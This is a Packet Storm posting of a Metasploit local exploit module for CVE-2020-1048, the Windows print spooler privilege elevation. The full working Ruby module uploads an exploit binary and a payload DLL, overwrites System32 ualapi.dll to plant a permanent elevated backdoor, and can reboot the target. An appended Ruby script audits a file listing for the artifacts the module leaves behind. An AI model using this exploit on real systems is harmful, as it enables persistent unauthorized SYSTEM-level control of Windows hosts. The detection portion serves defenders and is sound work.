Microsoft Spooler Local Privilege Elevation
Posted Sep 17, 2020
Authored by bwatters-r7, shubham0d, Yarden Shafir, Alex Ionescu | Site metasploit.com

This exploit leverages a file write vulnerability in the print spooler service, which restarts automatically if stopped. Because the service cannot be stopped long enough to remove the DLL, there is no way to remove the DLL once the service has loaded it. Essentially, on default settings, this module adds a permanent elevated backdoor.

tags | exploit
advisories | CVE-2020-1048
MD5 | dfa46dafd7f5bbc3e8f526a18d5976b2

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Spooler Local Privilege Elevation Vulnerability',
        'Description' => %q{
          This exploit leverages a file write vulnerability in the print spooler service
          which will restart if stopped. Because the service cannot be stopped long
          enough to remove the dll, there is no way to remove the dll once
          it is loaded by the service. Essentially, on default settings, this module
          adds a permanent elevated backdoor.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Yarden Shafir', # Original discovery
            'Alex Ionescu', # Original discovery
            'shubham0d', # PoC
            'bwatters-r7' # msf module
          ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Targets' =>
          [
            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Nov 04 2019',
        'References' =>
          [
            ['CVE', '2020-1048'],
            ['URL', 'https://windows-internals.com/printdemon-cve-2020-1048/']
          ],
        'DefaultOptions' =>
          {
            'DisablePayloadHandler' => true
          },
        'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
      )
    )

    register_options([
      OptString.new('EXPLOIT_NAME',
                    [true, 'The filename to use for the exploit binary (%RAND% by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
      OptString.new('PAYLOAD_NAME',
                    [true, 'The filename for the payload to be used on the target host (%RAND%.dll by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
      OptString.new('WRITABLE_DIR',
                    [false, 'Path to write binaries (%TEMP% by default).', nil]),
      OptString.new('OVERWRITE_DLL',
                    [false, 'Filename to overwrite (%WINDIR%\system32\ualapi.dll by default).', nil]),
      OptBool.new('RESTART_TARGET',
                  [true, 'Restart the target after exploit (you will lose your session until a second reboot).', false]),
      OptInt.new('EXECUTE_DELAY',
                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  # Uploads the bundled exploit binary for the target architecture and runs it to
  # copy source_file over destination_file with the spooler's privileges.
  def cve_2020_1048_privileged_filecopy(destination_file, source_file, exploit_path, target_arch, force_exploit = false)
    # Upload Exploit
    if target_arch == ARCH_X86
      vprint_status('Using x86 binary')
      exploit_bin = exploit_data('CVE-2020-1048', 'cve-2020-1048-exe.Win32.exe')
    else
      vprint_status('Using x64 binary')
      exploit_bin = exploit_data('CVE-2020-1048', 'cve-2020-1048-exe.x64.exe')
    end
    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
    if file?(exploit_path)
      print_error("#{exploit_path} already exists")
      return false unless force_exploit
    end
    fail_with(Failure::BadConfig, 'No exploit binary found') if exploit_bin.nil?
    write_file(exploit_path, exploit_bin)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

    # Run Exploit
    vprint_status('Running Exploit')
    begin
      output = cmd_exec('cmd.exe', "/c #{exploit_path} #{destination_file} #{source_file}")
    rescue Rex::TimeoutError => e
      elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
      print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
    end
    output
  end

  def exploit
    exploit_name = datastore['EXPLOIT_NAME']
    vprint_status("exploit_name = #{exploit_name}")
    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
    payload_name = datastore['PAYLOAD_NAME']
    # OVERWRITE_DLL is the registered option; it defaults to ualapi.dll under
    # %WINDIR%\system32, which the spooler loads when it (re)starts.
    if datastore['OVERWRITE_DLL'].nil? || datastore['OVERWRITE_DLL'].empty?
      win_dir = session.sys.config.getenv('windir')
      overwrite_target = "#{win_dir}\\system32\\ualapi.dll"
    else
      overwrite_target = datastore['OVERWRITE_DLL']
    end
    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
    payload_path = "#{temp_path}\\#{payload_name}"
    exploit_path = "#{temp_path}\\#{exploit_name}"
    payload_dll = generate_payload_dll

    # Check target
    vprint_status('Checking Target')
    validate_active_host
    validate_payload
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

    # Upload Payload
    vprint_status('Uploading Payload')
    ensure_clean_destination(payload_path)
    write_file(payload_path, payload_dll)
    print_status("Payload (#{payload_dll.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
    vprint_status("Sleeping for #{datastore['EXECUTE_DELAY']} seconds before launching exploit")
    sleep(datastore['EXECUTE_DELAY'])

    # Run the exploit
    output = cve_2020_1048_privileged_filecopy(overwrite_target, payload_path, exploit_path, sysinfo['Architecture'])
    vprint_status("Exploit output:\n#{output}")
    sleep(1) # make sure exploit is finished
    vprint_status("Removing #{exploit_path}")
    session.fs.file.rm(exploit_path)

    # Reboot, if desired
    if datastore['RESTART_TARGET']
      sleep(10)
      vprint_status("Rebooting #{sysinfo['Computer']}")
      reboot_command = 'shutdown /r'
      begin
        cmd_exec('cmd.exe', "/c #{reboot_command}")
      rescue Rex::TimeoutError => e
        elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
        print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
      end
    end
  end

  def validate_active_host
    begin
      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog('Could not connect to session', error: e)
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
  end

  def validate_payload
    vprint_status("Target Arch = #{sysinfo['Architecture']}")
    vprint_status("Payload Arch = #{payload.arch.first}")
    unless payload.arch.first == sysinfo['Architecture']
      fail_with(Failure::BadConfig, 'Payload arch must match target arch')
    end
  end

  def check
    sysinfo_value = sysinfo['OS']
    # sysinfo['OS'] reads like "Windows 10 (10.0 Build 18362)."; read the build
    # number from the "Build NNNNN" token rather than the first digit run that happens to fit.
    build_match = sysinfo_value.match(/Build (\d+)/)
    return Exploit::CheckCode::Unknown if build_match.nil?

    build_num = build_match[1].to_i
    vprint_status("Build Number = #{build_num}")
    return Exploit::CheckCode::Appears if sysinfo_value =~ /10/ && build_num <= 18363

    return Exploit::CheckCode::Safe
  end

  def ensure_clean_destination(path)
    return unless file?(path)

    print_status("#{path} already exists on the target. Deleting...")
    begin
      file_rm(path)
      print_status("Deleted #{path}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog(e)
      print_error("Unable to delete #{path}")
    end
  end
end
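The module's defaults leave two artifacts a defender can audit for: the DLL written to %WINDIR%\system32\ualapi.dll, which the spooler loads on its next start, and the payload file staged in %TEMP% under a random 6 to 14 letter name, which the module itself warns needs manual cleanup. The Ruby audit below is an added example, not code from the module or from Packet Storm; it runs over a constructed listing of [path, mtime] pairs and ties the staging files to the DLL by modification time, using the module's default EXECUTE_DELAY of 3 seconds as the basis for the correlation window.

```ruby
# Added defender-side example; not part of the Metasploit module above.
# Looks for the artifacts the module's defaults leave behind: ualapi.dll
# under System32 and the random-named staging files in the TEMP directory.

# Module defaults: the payload name is rand_text_alpha(6..14) with no extension;
# the exploit binary uses the same pattern plus ".exe" (the module deletes it after use).
STAGING_NAME = /\A[a-z]{6,14}(?:\.exe)?\z/i

# All ualapi.dll entries found under a System32 directory. ualapi.dll is not
# normally present on a Windows 10 client install, so a hit deserves a look on its own.
def ualapi_hits(listing)
  listing.select { |path, _| path.downcase.end_with?('\\system32\\ualapi.dll') }
end

# TEMP files matching the staging pattern whose mtime falls in the window before
# the DLL was written (module default EXECUTE_DELAY is 3 s plus upload time;
# 60 s leaves headroom for slow sessions). This is a heuristic, not proof.
def staging_hits(listing, dll_mtime, window: 60)
  listing.select do |path, mtime|
    dir, base = File.split(path.tr('\\', '/'))
    dir.downcase.end_with?('/temp') && base.match?(STAGING_NAME) &&
      mtime <= dll_mtime && (dll_mtime - mtime) <= window
  end
end

# Returns :clean when no ualapi.dll is present; otherwise :suspect with the DLL
# path(s) and the staging files correlated to the newest DLL write.
def audit(listing)
  dlls = ualapi_hits(listing)
  return { status: :clean, ualapi: [], staging: [] } if dlls.empty?

  newest = dlls.map { |_, mtime| mtime }.max
  {
    status: :suspect,
    ualapi: dlls.map(&:first),
    staging: staging_hits(listing, newest).map(&:first)
  }
end

# Constructed listing for illustration (paths, names and times are made up).
SAMPLE_LISTING = [
  ['C:\\Windows\\System32\\ualapi.dll',                    Time.utc(2020, 9, 17, 10, 0, 5)],
  ['C:\\Users\\alice\\AppData\\Local\\Temp\\qwfdsalkj',     Time.utc(2020, 9, 17, 10, 0, 0)],
  ['C:\\Users\\alice\\AppData\\Local\\Temp\\mbvqzrtle.exe', Time.utc(2020, 9, 17, 10, 0, 1)],
  ['C:\\Users\\alice\\AppData\\Local\\Temp\\setup_log.txt', Time.utc(2020, 9, 17, 9, 59, 0)],
  ['C:\\Windows\\System32\\spoolsv.exe',                   Time.utc(2019, 12, 7, 9, 14, 0)]
]

puts audit(SAMPLE_LISTING).inspect if $PROGRAM_NAME == __FILE__
```

On a real host the listing would come from a directory walk of System32 and the users' TEMP directories; the time correlation only narrows the staging candidates, so the ualapi.dll hit is the finding that matters.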

© 2020 Packet Storm. All rights reserved.